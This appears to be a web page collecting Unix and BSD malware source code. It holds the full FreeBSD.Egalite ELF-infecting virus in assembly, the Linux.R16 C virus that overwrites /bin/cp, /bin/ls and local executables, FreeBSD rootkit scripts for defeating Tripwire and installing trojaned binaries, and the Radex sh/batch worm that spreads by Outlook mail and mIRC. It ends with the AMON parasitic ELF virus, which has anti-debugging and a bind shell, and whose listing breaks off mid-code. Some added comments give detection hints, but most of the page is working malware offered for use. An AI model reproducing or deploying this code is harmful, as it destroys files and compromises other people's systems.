FreeBSD вирусы
FreeBSD.Egalite
; FreeBSD.Egalite herm1t@vx.netlux.org 19-10-2005
; NASM source, 32-bit FreeBSD/i386 (infect checks EI_OSABI == 9).
; All system calls use the BSD int 0x80 convention: arguments pushed on the
; stack, CF set on error -- see the `syscall` macro below.
BITS 32
CPU 386
global _start
; _mov reg, imm -- size-optimised immediate load, decided at assembly time:
;   imm == 0       -> xor reg, reg
;   0 < imm < 128  -> push byte imm / pop reg  (sign-extended 8-bit immediate)
;   otherwise      -> plain mov
; %2 must be a constant because the comparison is done by the preprocessor.
%macro _mov 2
%if %2 == 0
xor %1, %1
%else
%if %2 < 128
push byte %2
pop %1
%else
mov %1, %2
%endif
%endif
%endmacro
; O(x): offset of x from the start of the virus body (used for the
; old_entry patch slot and for VIRUS_SIZE).
%define O(x) (x - virus_start)
; syscall nr, nslots, err_label -- FreeBSD int 0x80 wrapper.
; The caller pushes the arguments (right to left) first; the extra
; `push eax` fills the return-address slot the BSD kernel entry expects
; above the arguments, so nslots = argument count + 1 and is what gets
; popped afterwards. CF set on return means error: the stack is cleaned
; and control jumps to %3. eax = result (or the error value) on return.
%macro syscall 3
_mov eax, %1
push eax
int 0x80
jnb %%L1
add esp, (%2 * 4)
jmp %3
%%L1: add esp, (%2 * 4)
%endm
%define PAGE_SIZE 4096      ; every infection grows the file by exactly this much
%define SYS_write 4         ; FreeBSD i386 syscall numbers
%define SYS_open 5
%define SYS_close 6
%define SYS_lseek 19
%define SYS_mmap 197
%define SYS_munmap 73
%define SYS_getdents 272
%define D_RECLEN 4          ; struct dirent: d_reclen (d_fileno occupies offset 0)
%define D_NAME 8            ; struct dirent: d_name
%define PT_LOAD 1           ; Elf32_Phdr p_type values
%define PT_INTERP 3
%define PT_PHDR 6
%define e_entry 24          ; Elf32_Ehdr field offsets
%define e_phoff 28
%define e_shoff 32
%define e_phnum 44
%define e_shnum 48
%define p_type 0            ; Elf32_Phdr field offsets (one entry = 32 bytes)
%define p_offset 4
%define p_vaddr 8
%define p_paddr 12
%define p_filesz 16
%define p_memsz 20
%define p_flags 24
%define p_align 28
%define sh_offset 16        ; Elf32_Shdr field offset (one entry = 40 bytes)
; Entry point of the carrier binary: go straight to the virus body.
; fake_host is the "host" the carrier returns to afterwards: exit(0) via the
; BSD convention (argument, dummy return slot, eax = 1 = exit). In an
; infected file the final `ret` in virus_start goes to the real host entry
; instead, because infect patches the old_entry slot.
_start: jmp virus_start
fake_host: push 0
mov eax, 1
push eax
int 0x80
; virus_start -- runs first in the carrier and in every infected host.
; Saves all registers, opens "." and tries to infect the entries found
; there; the loop ends after the first successful infection (`jnz .a1`),
; so each run touches at most one file. Then registers are restored and
; control is handed to the host through a pushed address: fake_host in the
; carrier, or the host's original e_entry once infect has written it into
; the old_entry slot. Uses a 1024-byte directory buffer on the stack.
virus_start: pusha
xor edx, edx
mov dh, 4                       ; edx = 0x400 = 1024, the buffer size
sub esp, edx                    ; reserve the buffer
mov ecx, esp                    ; ecx = buffer
mov word [ecx], 0x2e            ; buffer temporarily holds the path ".\0"
push 0                          ; flags = 0 (O_RDONLY)
push ecx                        ; path
syscall SYS_open, 3, .a1        ; open(".", 0); on error fall through to the exit path
xchg eax, ebx                   ; ebx = directory fd
push 1024                       ; find_first(fd, buf, 1024)
push ecx
push ebx
call find_first
or eax, eax                     ; eax = d_name of first entry, 0 if none
jz .a1
.a0: push eax
call infect                     ; eax = 1 if this file was infected
or eax, eax
jnz .a1                         ; one infection per run
push 1024                       ; find_next(fd, buf, 1024)
push ecx
push ebx
call find_next
or eax, eax
jnz .a0
.a1: add esp, edx               ; release the buffer
popa
push strict dword fake_host     ; forced 4-byte immediate so `$ - 4` addresses it
old_entry equ $ - 4             ; infect stores the host's original e_entry here
ret                             ; continue in the host (exit(0) in the carrier)
; infect(name) -- one dword argument on the stack, removed by `retn 4`.
; Returns eax = 1 if the file was infected, 0 otherwise; the result lives
; in pusha's saved-eax slot at [esp+28], cleared on entry and incremented
; on success.
; Target selection: 32-bit ET_EXEC / EM_386 files with EI_OSABI = 9
; (FreeBSD) whose EI_ABIVERSION byte (e_ident[8]) is still 0. That byte is
; set to 1 as the infection marker, which makes it the simplest signature
; for finding infected binaries on disk.
; Method: the file is grown by exactly PAGE_SIZE, all original bytes are
; shifted up one page, the virus body is written into the first page right
; after the PT_INTERP string (or after the program-header table when there
; is no PT_INTERP), and the ELF headers are patched so the first PT_LOAD
; segment starts one page lower in memory and covers the new page.
; Other observable effects: e_shoff and every sh_offset grow by 0x1000,
; e_entry points into the first page.
infect: pusha
mov ebx, [esp + 36]             ; ebx = filename (32 bytes of pusha + return address)
xor eax, eax
mov dword [esp + 28], eax       ; result := 0
cld
push 2                          ; open(name, 2 = O_RDWR)
push ebx
syscall SYS_open, 3, .return
xchg eax, ebx                   ; ebx = fd
push 2                          ; lseek(fd, 0, 2 = SEEK_END) -> file size
push 0
push ebx
syscall SYS_lseek, 4, .close
xchg eax, edx                   ; edx = file size
push 0                          ; mmap(0, size, 3 = PROT_READ|PROT_WRITE, 1 = MAP_SHARED,
push 0                          ;      fd, pad, 64-bit offset 0) -- trailing zeros are
push 0                          ;      pad + offset words of the FreeBSD ABI
push ebx
push 1
push 3
push edx
push 0
syscall SYS_mmap, 9, .close
xchg eax, esi                   ; esi = mapped file
mov eax, dword [esi]
add eax, 0xb9b3ba81             ; zero iff [esi] == 0x464C457F ("\x7FELF")
jnz .unmap
cmp dword [esi + 16], 0x00030002 ; e_type = 2 (ET_EXEC), e_machine = 3 (EM_386)
jne .unmap
mov eax, [esi + 20]             ; e_version must be 1
dec eax
jnz .unmap
cmp byte [esi + 7], 9           ; e_ident[EI_OSABI] = 9 (FreeBSD)
jne .unmap
cmp byte [esi + 8], 1           ; e_ident[EI_ABIVERSION] = 1 means already infected
je .unmap
mov edi, esi
add edi, [esi + e_phoff]        ; edi = program header table
movzx ecx, word [esi + e_phnum]
mov ebp, ecx
shl ebp, 5                      ; ebp = e_phoff + e_phnum * 32 = end of the phdr table
add ebp, [esi + e_phoff]        ;       (default insertion point)
.f0: cmp dword [edi + p_type], PT_INTERP
jne .f1
mov ebp, [edi + p_offset]       ; PT_INTERP found: insert right after the interpreter string
add ebp, [edi + p_filesz]
jmp .f2
.f1: add edi, 32
loop .f0
.f2: mov ecx, PAGE_SIZE
sub ecx, ebp                    ; room left in the first page
cmp ecx, VIRUS_SIZE
jb .unmap                       ; body does not fit -> leave the file alone
pusha
push edx                        ; munmap(map, size) before growing the file
push esi
syscall SYS_munmap, 3, .unmap
push 64
pop ecx
sub esp, ecx                    ; 64 zero bytes on the stack
mov edi, esp
xor eax, eax
push ecx
push edi
rep stosb
pop edi
pop ecx                         ; ecx = 64 iterations
.i0: push 64                    ; write(fd, zeros, 64), 64 times = one PAGE_SIZE of zeros appended
push edi
push ebx
mov eax, SYS_write
push eax
int 0x80
add esp, 16
cmp eax, 64
je .i1
add esp, 64                     ; short write: give up on this file
popa
jmp .unmap
.i1: loop .i0
add esp, 64
add edx, PAGE_SIZE              ; edx = new file size
push 0                          ; remap the grown file (same arguments as above)
push 0
push 0
push ebx
push 1
push 3
push edx
push 0
mov eax, SYS_mmap
push eax
int 0x80
jnc .i2
add esp, 36
popa
jmp .close
.i2: add esp, 36
xchg eax, esi                   ; esi = new mapping
push esi
lea edi, [esi + edx]            ; move the whole original image up by one page,
lea esi, [edi - PAGE_SIZE]      ; copying backwards (DF = 1) because src/dst overlap
lea ecx, [edx - PAGE_SIZE]
std
rep movsb
pop esi
mov [esp + 4], esi              ; update the esi slot popa will restore (new map)
mov [esp + 20], edx             ; and the edx slot (new size)
cld
lea edi, [esi + ebp]            ; destination: first page, insertion offset
call .a0                        ; delta trick: esi = address of the running body
.a0: pop esi
lea esi, [esi - .a0 + virus_start]
mov ecx, VIRUS_SIZE
rep movsb                       ; write the body
mov ecx, PAGE_SIZE - VIRUS_SIZE
xor eax, eax
rep stosb                       ; zero-fill up to the next page boundary
popa                            ; esi = map, edx = size, ebx = fd, ebp = insertion offset
mov edi, esi
add edi, [esi + e_phoff]
movzx ecx, word [esi + e_phnum]
.h0: mov eax, PAGE_SIZE         ; eax = PAGE_SIZE for every branch below
cmp dword [edi + p_type], PT_LOAD
jne .h1
cmp dword [edi + p_offset], 0   ; only the PT_LOAD that starts at file offset 0
jne .h1
sub [edi + p_vaddr], eax        ; it now starts one page lower in memory ...
sub [edi + p_paddr], eax
add [edi + p_filesz], eax       ; ... and is one page larger
add [edi + p_memsz], eax
push eax
mov eax, [esi + e_entry]
mov [esi + ebp + O(old_entry)], eax ; save the host entry into the copied body's old_entry slot
mov eax, [edi + p_vaddr]
add eax, ebp
mov [esi + e_entry], eax        ; new entry = segment vaddr + insertion offset
mov byte [esi + 8], 1           ; set EI_ABIVERSION = 1 (infection marker)
pop eax
jmp .h4
.h1: cmp dword [edi + p_type], PT_PHDR
je .h2
cmp dword [edi + p_type], PT_INTERP
jne .h3
.h2: sub [edi + p_vaddr], eax   ; PT_PHDR / PT_INTERP stay in the first page, which moved down in memory
sub [edi + p_paddr], eax
jmp .h4
.h3: add [edi + p_offset], eax  ; everything else moved up one page in the file
.h4: add edi, 32
loop .h0
mov eax, PAGE_SIZE
add [esi + e_shoff], eax        ; section header table moved too ...
mov edi, esi
add edi, [esi + e_shoff]
movzx ecx, word [esi + e_shnum]
.g0: add [edi + sh_offset], eax ; ... and every section's file offset
add edi, 40
loop .g0
inc dword [esp + 28]            ; result := 1
.unmap: push edx                ; munmap(map, size)
push esi
mov eax, SYS_munmap
push eax
int 0x80
add esp, 12
.close: push ebx                ; close(fd)
mov eax, SYS_close
push eax
int 0x80
add esp, 8
.return: popa
retn 4
; find_first(fd, buf, bufsize) / find_next(fd, buf, bufsize)
; Directory iteration over getdents(). Arguments after pusha:
; [esp+36] = fd, [esp+40] = buf, [esp+44] = bufsize. Returns eax = pointer
; to the current entry's d_name, or 0 when the directory is exhausted;
; `retn 12` removes the three arguments.
; The first dword of buf -- d_fileno of the record at the front, which this
; code never reads -- doubles as the count of records still buffered.
; find_first zeroes it so the first call refills the buffer, then falls
; into find_next's body.
find_first: pusha
xor eax, eax
mov edi, [esp + 40]
mov [edi], eax                  ; remaining-record count := 0
jmp find_next.s0
find_next: pusha
mov edi, [esp + 40]             ; edi = buf
.s0: mov ebx, [esp + 36]        ; ebx = fd
mov ecx, [esp + 44]             ; ecx = bufsize
mov edx, [edi]                  ; edx = records left from the previous getdents
or edx, edx
jnz .s2
push ecx                        ; buffer empty: getdents(fd, buf, bufsize)
push edi
push ebx
syscall SYS_getdents, 4, .s4
or eax, eax
jz .s4                          ; 0 bytes: end of directory
xor ebp, ebp
.s1: add bp, word [edi + ebp + D_RECLEN] ; count the records in the eax bytes returned
inc edx
cmp ebp, eax
jb .s1
jmp .s3
.s2: push edi                   ; drop the record at the front: shift the rest of the buffer down
movzx eax, word [edi + D_RECLEN]
lea esi, [edi + eax]
sub ecx, eax
cld
rep movsb
pop edi
.s3: dec edx                    ; one record consumed
lea eax, [edi + D_NAME]         ; return its name
jmp .s5
.s4: xor eax, eax               ; error / no more entries
.s5: mov [esp + 28], eax        ; result into the saved-eax slot
mov [edi], edx                  ; store the remaining count in buf's first dword
popa
retn 12
VIRUS_SIZE equ O($)             ; size of the body copied by infect
*NIX (Unix, Linux, *BSD)
// ---------------------------
// Linux.R16 by Radix16[MIONS]
// ---------------------------
//
//!!!!!!!!!!!!!!!!!!!!!!!!!
//!rewrite all filez virus!
//!!!!!!!!!!!!!!!!!!!!!!!!!
//
// This is my mini first virus for Linux
// I love Linux and spice ,sux all win product
//
// Text print in text rezim
//
// ------------------------------
// - Linux.R16 by Radix16[MIONS]-
// - I'am virus for Linux -
// - Made in Czech republic -
// ------------------------------
//
// ------------
// Contact meee :
// ------------
// Radix16.cjb.net
//
// Radix16@Atlas.cz
//
// -----------
// How compile :
// -----------
// gcc radix.cpp
//
// -------------
// Start my code :
// -------------
#include <stdio.h>
#include <dirent.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <fcntl.h>
#include <unistd.h>
/* Number of bytes of its own executable (argv[0]) the program reads and
 * writes over each victim; it is a fixed constant, not the real file size. */
#define VirusSize 59100
/* Overwriting (non-parasitic) file virus: reads the first VirusSize bytes
 * of its own image from argv[0] and writes them over /usr/sexloader,
 * /bin/cp, /bin/ls and then every entry of the current directory that
 * passes access(X_OK | W_OK). No host code is kept, so an overwritten file
 * is destroyed and can only be restored from backup. The hard-coded paths
 * and the marker file /usr/tmp001x.not (created on first run, then the
 * banner is printed) are the artefacts to look for. */
int main(int argc,char *argv[]) { // Main program
ssize_t ret;
int handle, bytes , retn;
char *buff[256];
char *ch,virus[VirusSize];
struct dirent *dirp;
DIR *dp;
char pathname[1024];
handle = open(argv[0],O_RDONLY);
read(handle,virus,VirusSize);                  /* self image -> virus[] */
handle = creat ("/usr/sexloader",7);           /* mode 7 = --- --- rwx */
if (handle == -1) {
printf("uf!");
}
write(handle,virus,VirusSize);
handle = creat ("/bin/cp",7);
if (handle == -1) {
printf("ou!");
}
write(handle,virus,VirusSize);
handle = creat ("/bin/ls",7);
if (handle == -1) {
printf("Shit!");
}
write(handle,virus,VirusSize);
handle = open("/usr/tmp001x.not",O_RDWR);      /* first-run marker file */
if (handle == -1) {
handle = creat ("/usr/tmp001x.not",0);
if (handle == -1) {
ret = write(handle, "Contact me:"
"\n\n"
"Radix16.cjb.net"
"\n"
"Radix16@atlas.cz",11+2+15+1+16);
if (ret == -1) {
exit(0);
}
printf ("\n\n");
printf ("\t\t""Linux.R16 by Radix16[MIONS]" " \n");// (c)oded
printf ("\t\t""I'am free virus for Linux :)" "\n");// Print text (textrezim)
printf ("\t\t""Made in Czech republic" "\n");// My World
printf ("\n\n");
exit(retn);                                    /* retn is never assigned */
}
}
if ((dp = opendir(".")) == NULL)
{
printf("hech!");
exit(1);
}
readdir(dp); readdir(dp);                      /* skip the first two entries (presumably "." and "..") */
while (1) {
if ((dirp = readdir(dp)) == NULL) {
closedir(dp);
return(0);
}
if (access(dirp->d_name,X_OK | W_OK) < 0) {    /* stops at the first non-writable/non-executable entry */
exit(-1);
}
handle = creat (dirp->d_name,7);
if (handle == -1) {
printf("zzz..");
}
write(handle,virus,VirusSize);
}
close(handle);
exit(retn);
// End program(virus)
}
FreeBsd rootkit
#!/bin/sh
# Simple script to avoid detection by tripwire. Modify to suit your needs.
#
# What it does: locates the tripwire binary and its database, then for each
# binary given on the command line runs `tripwire -update` and copies the
# regenerated database over the live one, so the replaced binaries stop
# showing up as modified. If the database is read-only it hands off to
# `make tripwire-inst` / `install.sh` (neither is on this page).
# Defensive takeaway: the integrity database is rewritten in place, which
# is exactly why Tripwire recommends keeping it on read-only/offline media
# and why a database whose mtime changes outside scheduled runs is a red flag.
echo -n "Trying to guess the location of tripwire. . ."
TRIPWIRE=`which tripwire`
if [ ! -x $TRIPWIRE ]; then
echo "Failed!"
echo -n "Please enter a full path to tripwire: "
while read TRIPWIRE; do
if [ -x $TRIPWIRE ]; then
echo "Ok."
break
else
echo -n "That doesn't exist! Try again: "
fi
done
else
echo "Ok: $TRIPWIRE"
fi
echo -n "Trying to guess the location of the tripwire database. . ."
DBPATH="/usr/adm/tcheck/databases/tw.db"        # default location tried first
if [ ! -f $DBPATH ]; then
echo "Failed!"
echo -n "Please enter the name of the database file: "
while read DBPATH; do
if [ -f $DBPATH ]; then
echo "Ok."
break
else
echo -n "That doesn't exist! Try again: "
fi
done
else
echo "Ok: $DBPATH"
fi
DONE=false
while [ $DONE = "false" ]; do
DONE=true
echo -n "Is the database file read-only?[y(n)] "
read ANSWER
case $ANSWER in
[yY] )
make tripwire-inst                              # external: not shown on this page
install.sh $TRIPWIRE
exit 0 ;;
[nN] )
break ;;
* )
echo "Yes or No"\!
DONE=false ;;
esac
done
DBFILE=./databases/`basename $DBPATH`           # where `tripwire -update` writes its new database
for BIN; do                                     # iterate over the positional arguments
echo -n "Updating $BIN. . ."
$TRIPWIRE -update $BIN
mv $DBFILE $DBPATH                              # overwrite the live database
echo "done."
done
echo "All done here chief!"
#!/bin/sh
# Installation script for the FreeBSD rootkit. Make as many changes as you like.
# Uncomment the below line if you want to backup the files.
#BAKDIR=bak
# For every binary path given as an argument, replaces it with the kit's
# version found at <name>/<name> relative to the cwd. `addlen` and `fix`
# are helper tools of the kit that are not on this page; from their
# arguments, `fix` appears to be what swaps the file in (and optionally
# keeps a copy under $BAKDIR). Trojaned system binaries of this kind are
# what file-integrity checking and package-manager verification exist to catch.
for BIN; do
PROG=`basename $BIN`
echo -n "Installing $PROG. . ."
RKBIN=$PROG/$PROG                               # replacement binary shipped with the kit
if [ -x $BIN ]; then
addlen $RKBIN $BIN
fix $BIN $RKBIN $BAKDIR
fi
echo "done."
done
echo "The installation is complete."
Radex
# /bin/sh
# Polyglot sh / DOS batch dropper. The lines before the :DOS_WIN label are
# the sh part (copies the .bat to /tmp and / and appends itself to *.sh in
# the cwd); under sh the batch lines below only produce "command not found"
# errors. Under a DOS/Windows batch interpreter the sh lines fail and
# execution reaches :DOS_WIN, which adds a run= line to win.ini, drops a
# WSH script (LINUX_SH_DOS_BAT_WIN_JS.js) that copies itself into the
# Windows folder, mails the .bat to the author's address via Outlook and
# writes a mIRC script.ini that DCC-sends the file to anyone joining a
# channel. Those files and the win.ini change are the artefacts to check.
echo "-=LINUX START=-"
cp LINUX_SH_DOS_BAT_WIN_JS.bat /tmp/LINUX_SH_DOS_BAT_WIN_JS.bat
cp LINUX_SH_DOS_BAT_WIN_JS.bat /
cat LINUX_SH_DOS_BAT_WIN_JS.bat >> *.sh
:DOS_WIN
@ctty nul
cls
echo -=DOS/WIN START=-
rem ONLY SAMPLE (TEST)
rem WoRlD iS mY
rem --- persistence: prepend run= to win.ini ($buffer is a literal file name here)
echo [windows] >>$buffer
echo run=C:\WINDOWS\LINUX_SH_DOS_BAT_WIN_JS.js >>$buffer
type c:\windows\win.ini >>$buffer
type $buffer >c:\windows\win.ini
del $buffer
rem --- generate the WSH payload line by line
echo // LINUX_SH_DOS_BAT_WIN_JS > LINUX_SH_DOS_BAT_WIN_JS.js
echo var Topic_Text = "Radix16/SMF" >> LINUX_SH_DOS_BAT_WIN_JS.js
echo var Title_Text = "SH-BAT-JS" >> LINUX_SH_DOS_BAT_WIN_JS.js
echo var virusname = "LINUX_SH_DOS_BAT_WIN_JS.js" >> LINUX_SH_DOS_BAT_WIN_JS.js
echo var WSHShell = WScript.CreateObject("WScript.Shell") >> LINUX_SH_DOS_BAT_WIN_JS.js
echo msgb = WSHShell.Popup(Title_Text,0,Topic_Text,0); >> LINUX_SH_DOS_BAT_WIN_JS.js
echo var fso = WScript.CreateObject("Scripting.FileSystemObject") >> LINUX_SH_DOS_BAT_WIN_JS.js
echo var s1dir = fso.GetSpecialFolder(0) >> LINUX_SH_DOS_BAT_WIN_JS.js
echo var wormname = fso.GetFile(WScript.ScriptFullName) >> LINUX_SH_DOS_BAT_WIN_JS.js
echo wormname.copy (s1dir + "\\" + virusname) >> LINUX_SH_DOS_BAT_WIN_JS.js
echo var Outlook = WScript.CreateObject("Outlook.Application")>> LINUX_SH_DOS_BAT_WIN_JS.js
echo var msgmapi = Outlook.CreateItem(0)>> LINUX_SH_DOS_BAT_WIN_JS.js
echo msgmapi.To = "Radix16@atlas.cz" >> LINUX_SH_DOS_BAT_WIN_JS.js
echo msgmapi.Subject = "SHBATJS">> LINUX_SH_DOS_BAT_WIN_JS.js
echo msgmapi.Body = "crazzy bat :) testing MS OTLOOK in the (WORLD) ">> LINUX_SH_DOS_BAT_WIN_JS.js
echo msgmapi.Attachments.Add (s1dir + "\\LINUX_SH_DOS_BAT_WIN_JS.bat") >> LINUX_SH_DOS_BAT_WIN_JS.js
echo msgmapi.DeleteAfterSubmit = 1 >> LINUX_SH_DOS_BAT_WIN_JS.js
echo msgmapi.Send >> LINUX_SH_DOS_BAT_WIN_JS.js
echo var IRCpath = ("C:\\mirc\\") >> LINUX_SH_DOS_BAT_WIN_JS.js
echo var True = 1 >> LINUX_SH_DOS_BAT_WIN_JS.js
echo var IRCbxs = fso.CreateTextFile(IRCpath + "script.ini", True) >> LINUX_SH_DOS_BAT_WIN_JS.js
echo IRCbxs.WriteLine ("[script]") >> LINUX_SH_DOS_BAT_WIN_JS.js
echo IRCbxs.WriteLine ("n0=ON 1:JOIN:#:{ /if ( $nick == $me ) { halt }") >> LINUX_SH_DOS_BAT_WIN_JS.js
echo IRCbxs.WriteLine ("n1=/dcc send $nick " + s1dir + "\\LINUX_SH_DOS_BAT_WIN_JS.bat") >> LINUX_SH_DOS_BAT_WIN_JS.js
echo IRCbxs.WriteLine ("}") >> LINUX_SH_DOS_BAT_WIN_JS.js
rem --- self-copies of the batch file, then run the generated script
type %0 C:\Windows\winstart.bat
copy %0 C:\Windows\LINUX_SH_DOS_BAT_WIN_JS.bat
copy %0 C:\Win95\LINUX_SH_DOS_BAT_WIN_JS.bat
copy %0 C:\Win98\LINUX_SH_DOS_BAT_WIN_JS.bat
copy %0 C:\WinME\LINUX_SH_DOS_BAT_WIN_JS.bat
wscript.exe LINUX_SH_DOS_BAT_WIN_JS.js
del LINUX_SH_DOS_BAT_WIN_JS.js
cls
AMON : parasitic ELF virus
;------------------------------------------------------------------------------
;
;
;
; AMON : parasitic ELF virus
;
;
;
;
; Description :
; -------------
;
; - Infect all ELF in the current directory.
; - Full compatible with all kernel 2.2.x,2.4.x and probably with all 2.6.x.
; - Full compatible with all options of kernel security patch (PaX/grsec ...).
; - Use basic EPO technic.
; - Use basic anti debug trick.
; - Bind a shell on port 5556 if UID = 0 else bind a shell on port 5555.
; - Only 960 bytes with complete strip.
; - Restore date and time of last modification.
;anonymous@neptune ~/code/amon $ cat Makefile
;all:
; @echo "-+ amon by rikenar and emp +-"
; nasm -f elf amon.asm
; cc amon.o -o amon -nostdlib
; rm -f amon.o
;
;strip:
; strip amon
; sstrip amon
;
;
;anonymous@neptune ~/code/amon $ make
;-+ amon by rikenar and emp +-
;nasm -f elf amon.asm
;cc amon.o -o amon -nostdlib
;rm -f amon.o
;
;
;anonymous@neptune ~/code/amon $ make strip
;strip amon
;sstrip amon
;
;
;anonymous@neptune ~/code/amon $ ls -l amon
;-rwx------ 1 anonymous anonymous 960 nov 7 01:48 amon
;
;
;
;
;
;greetz : people on #ioc and all our friends
;
;------------------------------------------------------------------------------
; Linux i386 syscall numbers (int 0x80 convention: eax = number, ebx/ecx/edx/esi = args).
%define sys_fork 2
%define sys_read 3
%define sys_open 5
%define sys_close 6
%define sys_exec 11
%define sys_getpid 20
%define sys_getuid 24
%define sys_ptrace 26
%define sys_kill 37
%define sys_dup2 63
%define sys_mmap 90                 ; old_mmap: single pointer to an argument struct (see Mapping)
%define sys_munmap 91
%define sys_ftruncate 93
%define sys_socket 102              ; socketcall: ebx selects socket/bind/listen/accept
%define sys_fstat 108
%define sys_getdents 141
%define PT_LOAD 01
%define O_RDWR 2
%define LISTEN 4                    ; socketcall sub-function numbers used by bindshell
%define SIGKILL 9
%define ELFMAG 0x464C457F           ; "\x7FELF" as a little-endian dword
global _start
; Non-standard section name: a trivial static indicator in the carrier
; binary (section headers are not copied into infected hosts).
section .evil
; _start -- main loop. Anti-debug check, fork the bind shell (bomb), then
; walk the current directory with getdents and call infection on every
; ELF that is not already infected. The dirent buffer lives on the stack
; (getdents leaves esp pointing at it). Timestamps of infected files are
; restored with utime(), so mtime alone will not reveal an infection;
; the file size becoming a multiple of 0x1000 (see verif) will.
_start:
;ptrace(PTRACE_TRACEME, 0, 0x1, 0)
;
;
;anti debug trick
xor eax, eax
cdq                                 ; edx = 0
inc edx                             ; edx = 1
xor ecx, ecx
xor ebx, ebx ;PTRACE_TRACEME
xor esi, esi
mov al, sys_ptrace
int 0x80
test eax, eax ;
jne NEAR byebye ;if code is traced then exit  -- PTRACE_TRACEME fails when a tracer is attached
call bomb                           ; child: bind shell; parent continues here
push '.'                            ; ".\0\0\0" on the stack
mov ebx, esp
call opendir ;open current directory
call getdents ;list file of this directory    -- esp -> first linux_dirent afterwards
add esp, 0x08 ;next name                      -- skip d_ino and d_off: esp -> d_reclen
again:
mov ebx, esp
add ebx, 2                          ; ebx = d_name (right after the 2-byte d_reclen)
mov esi, ebx                        ; esi = name, needed again for utime
call openfile ; open file           -- O_RDWR, result in eax
cmp ah, 0xFF ; if error on open     -- negative return value
je nextf ; find another file
call verif ; test file type and infection    -- eax != 0 only for an ELF whose size is not a 0x1000 multiple
test eax, eax ;
je nextf ; find another file
mov eax, sys_fstat
sub esp, 0x40                       ; struct stat on the stack
mov ecx, esp
int 0x80 ; file size
add esp, 0x40 ;
push DWORD [ecx+0x28]               ; st_mtime (offsets as assumed by this code)
push DWORD [ecx+0x20]               ; st_atime
push esi ; save name of file for utime.
mov ecx, [ecx+0x14] ; ecx = st_size
mov esi, ecx
call infection ; WAR IS ON !
xchg ebx, esi ; fd in esi.
mov eax, 0x1e                       ; syscall 30 = utime
pop ebx                             ; ebx = name
mov ecx, esp                        ; ecx -> {atime, mtime} pushed above
int 0x80                            ; put the original timestamps back
add esp, 8
nextf:
xchg esi, ebx ; fd in ebx.
mov eax, sys_close
int 0x80
call nextfile ; find next file      -- eax = next d_reclen, 0 = end of buffer
test eax, eax
jne again
exit:
byebye:
xor eax, eax
inc eax ; bye bye                   -- exit(0); in an infected host the body runs from .dtors (see hijackDtors), so this ends the host process too
xor ebx, ebx
int 0x80
;---------------------------------------------------------------------------
;
; infection functions
;
; infection -- in: ebx = fd, ecx = esi = current file size.
; Grows the file to the next 0x1000 multiple above size + 0x1000, maps it,
; moves everything from the PT_INTERP segment's file offset onwards up by
; 0x1000, patches program and section headers (PatchSegment, PatchSection,
; e_shoff), copies the bytes between _start and fin_code into the gap and
; registers their virtual address in .dtors (hijackDtors).
; Assumes the second program header is PT_INTERP (e_phoff + e_phentsize);
; its type is not checked. The resulting page-multiple file size is what
; verif treats as "already infected" and is a cheap scanner indicator.
infection:
add ecx, 0x2000
and ecx, 0xFFFFF000                 ; round up to a page multiple, at least one page more
mov eax, sys_ftruncate ; size of file multiple of 0x1000
int 0x80 ;
push ebx ; save fd
push ecx ; push size of file for unmap
call Mapping ; map file, adress of map in eax.
xchg esi, ecx                       ; ecx = original size (from esi), esi = mapped size
mov ebx, [eax+0x1c]                 ; e_phoff
add bx, WORD [eax+0x2a] ; phdr INTERP.   -- + e_phentsize = second program header
mov esi, [eax+ebx+0x04] ; offset of this phdr.   -- p_offset
push esi                            ; insertion offset, popped into edi later
sub ecx, esi ; size of code to move.
sub esp, ecx                        ; temporary copy of the tail on the stack
add esi, eax
mov edx, ecx
mov edi, esp
rep movsb ;
mov esi, esp
mov ecx, edx
mov ebx, [eax+0x1c]
add bx, WORD [eax+0x2a]
mov edi, [eax+ebx+4]
add edi, eax
add edi, 0x1000
rep movsb                           ; write the tail back one page further on
add esp, edx ;
call PatchSegment ; Patch segments.   -- also leaves ebp = new p_vaddr of the text segment
pop edi                             ; edi = insertion offset
push eax
mov ecx, edi
call PatchSection ; Patch sections.
pop eax
mov ecx, 0x1000
add [eax+0x20], ecx ; Patch e_shoff.
call delta
delta: pop ebx
sub ebx, delta ; delta offset.      -- runtime address minus link-time address
mov esi, _start
add esi, ebx                        ; esi = the running copy of the body
add ebp, edi ; ebp = adress of code   -- virtual address the body gets in the host
add edi, eax                        ; position in the mapped file
mov ecx, fin_code - _start
rep movsb ; write code.
mov ebx, eax
call hijackDtors ; hijack .dtors.
pop ecx ; restaure the size
call Demap
pop ebx ; restaure fd
ret
;----------------------------------------------------------------------------
;
;in : name directory in ebx
;out : fd in eax
; open(name, O_RDONLY, 0)
opendir:
xor eax, eax
mov al, sys_open
xor ecx, ecx ;O_RDONLY
xor edx, edx ;
int 0x80
ret
;-----------------------------------------------------------------------------
;
;in : pointer to name of file in ebx
;out : fd in ebx
; (The kernel returns the fd in eax; ebx is left holding the name pointer.
;  Callers read eax, see `cmp ah, 0xFF` in _start.)  open(name, O_RDWR, 0)
openfile:
xor eax, eax
mov al, sys_open ;open
xor ecx, ecx
mov cl, O_RDWR
xor edx, edx
int 0x80
ret
;-----------------------------------------------------------------------------
;
;in : directory fd in eax
;out : result of getdents on stack
; Pops its own return address, reserves 0x10000 bytes, calls
; getdents(fd, buf, 0x10000), then pushes the return address back and
; returns -- so after the `ret` the caller's esp points at the buffer.
; The byte count returned in eax is not checked.
getdents:
pop esi ;save ret addr
sub esp, 0x10000 ;i want some place on stack
xchg eax, ebx
xor eax, eax
mov al, sys_getdents
mov ecx, esp
mov edx, 0x10000
int 0x80
push esi ;
ret
;-----------------------------------------------------------------------------
;
;in : file fd in eax
;out : ebx == NULL if file type false or infection true
; (The result is actually in eax: 0 when the first 4 bytes are not "\x7FELF"
;  or when st_size is a multiple of 0x1000 -- taken as "already infected";
;  otherwise st_size / 0x1000, which is non-zero only for files of at
;  least 0x1000 bytes.) Leaves ebx = fd.
verif:
xchg ebx, eax
call read
cmp eax, ELFMAG ;if file is not an ELF
je verifsuite
xor eax, eax ;eax == 0
ret ;
verifsuite:
;check infection
mov eax, sys_fstat
sub esp, 0x40
mov ecx, esp
int 0x80
add esp, 0x40
xor edx, edx
mov eax, [ecx+0x14]                 ; st_size
mov ecx, 0x1000
div ecx                             ; eax = size / 0x1000, edx = size % 0x1000
test edx, edx ; is file align on 0x1000 ?
jne notinfected ; if no file is not infected, infection FALSE
xor eax, eax ; else infection TRUE
notinfected:
ret
;----------------------------------------------------------------------------
;
;in : pointer of file name in esp
;out : pointer of next file name in esp
; esp points at the current record's d_reclen; adding it (low byte only)
; lands on the next record's d_reclen, which is returned in eax.
nextfile:
pop ebx ; save ret adress
